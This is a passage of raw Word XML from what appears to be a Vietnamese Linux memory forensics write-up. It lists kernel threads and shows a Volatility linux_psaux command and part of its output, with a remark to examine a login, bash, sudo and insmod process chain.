        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>acpi_thermal_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">pm]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8310C4" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_eh_0]         80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E27395E" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_tmf_0]        81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D0C940" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_eh_1]         82</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C5910F" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_tmf_1]        83</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435AF38C" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u2:2]      84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E0885" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u2:3]      85</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD994CE" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ipv6_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">addrconf]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E8F69" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[kstrp]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">          98</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28406A31" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>charger_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">manager]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36925F" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:2]       116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A25AC" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:3]       166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A4052F" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">H]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D67C3C7" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_eh_2]         214</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CE6BC1" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>scsi_tmf_2]        215</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A08A95F" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ttm_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">swap]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">       216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69568EAE" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>irq/18-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">vmwgfx]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  217</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AC9C00" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[kdmflush]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">       225</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E99054" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">.[bioset]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">         226</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B52C8AC" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>raid5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">wq]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">        300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E94661" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>jbd2/dm-0-8]       361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3DAD31" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ext4-rsv-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">conver]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>362</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1229DBE3" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>iscsi_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">eh]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">       439</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE557F2" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ib-comp-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">wq]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BDFDD" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ib-comp-unb-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">wq]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74781259" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ib_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">mcast]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">       446</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D64E448" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ib_nl_sa_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">wq]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    447</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6296730C" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rdma_cm]           451</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C88BD8" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>iprt-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">VBoxWQueue]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>477</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9BA4E" w14:textId="77777777" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>jbd2/sda2-8]       614</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23399675" w14:textId="525D1E32" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ext4-rsv-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">conver]   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>615</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD1041" w14:textId="4EECC06C" w:rsidR="00B772CE" w:rsidRDefault="00B772CE" w:rsidP="00B772CE">
      <w:r w:rsidRPr="00B772CE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B9EBECE" wp14:editId="5D82919D">
            <wp:extent cx="5943600" cy="3464560"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="63688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87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F94B" w14:textId="6285927C" w:rsidR="0019491C" w:rsidRDefault="00B772CE" w:rsidP="00B70DDB">
      <w:r w:rsidRPr="00B772CE">
        <w:t xml:space="preserve">Chú ý hơn vào chuỗi tiến trình login → bash → sudo → insmod </w:t>
      </w:r>
      <w:r w:rsidR="00191F7F">
        <w:t>và process python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D10B13" w14:textId="536712D8" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00B70DDB">
      <w:r w:rsidRPr="00191F7F">
        <w:t xml:space="preserve">Tiếp tục sử dụng plugin linux_psaux để kiểm tra command line của các </w:t>
      </w:r>
      <w:r>
        <w:t>process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ADD39A" w14:textId="510C2415" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00B70DDB">
      <w:r w:rsidRPr="00191F7F">
        <w:t>vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_psaux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663191A0" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>Pid    Uid    Gid    Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AC86A9" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t>1      0      0      /sbin/init maybe-ubiquity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6CB92" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">2      0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kthreadd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AC997F" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">3      0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668987E8" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">4      0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/0:0H]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452FC944" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">5      0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kworker/u2:0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55490474" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">6      0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>mm_percpu_wq]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3CAC4E" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">7      0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ksoftirqd/0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB2831" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">8      0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rcu_sched]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0031C362" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">9      0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rcu_bh]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10214971" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">10     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>migration/0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B286D" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">11     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>watchdog/0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1AC489" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">12     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>cpuhp/0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F266C8" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">13     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kdevtmpfs]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5DC42C" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">14     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>netns]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3BAAB2" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">15     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>rcu_tasks_kthre]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421038EB" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">16     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kauditd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03646970" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">17     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>khungtaskd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DADE7" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">18     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>oom_reaper]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797543F1" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">19     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>writeback]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BC6A44" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">20     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kcompactd0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314573F8" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">21     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ksmd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EAC96" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">22     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>khugepaged]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AFD8E0" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">23     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>crypto]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FCFCF" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">24     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kintegrityd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36740826" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">25     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>kblockd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C696C61" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">26     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>ata_sff]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136F7F29" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">27     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>md]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376E0B08" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">28     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>edac-poller]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AA0228" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">29     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>devfreq_wq]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21809C" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">30     0      0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>watchdogd]</w:t>
      </w:r>
    </w:p>
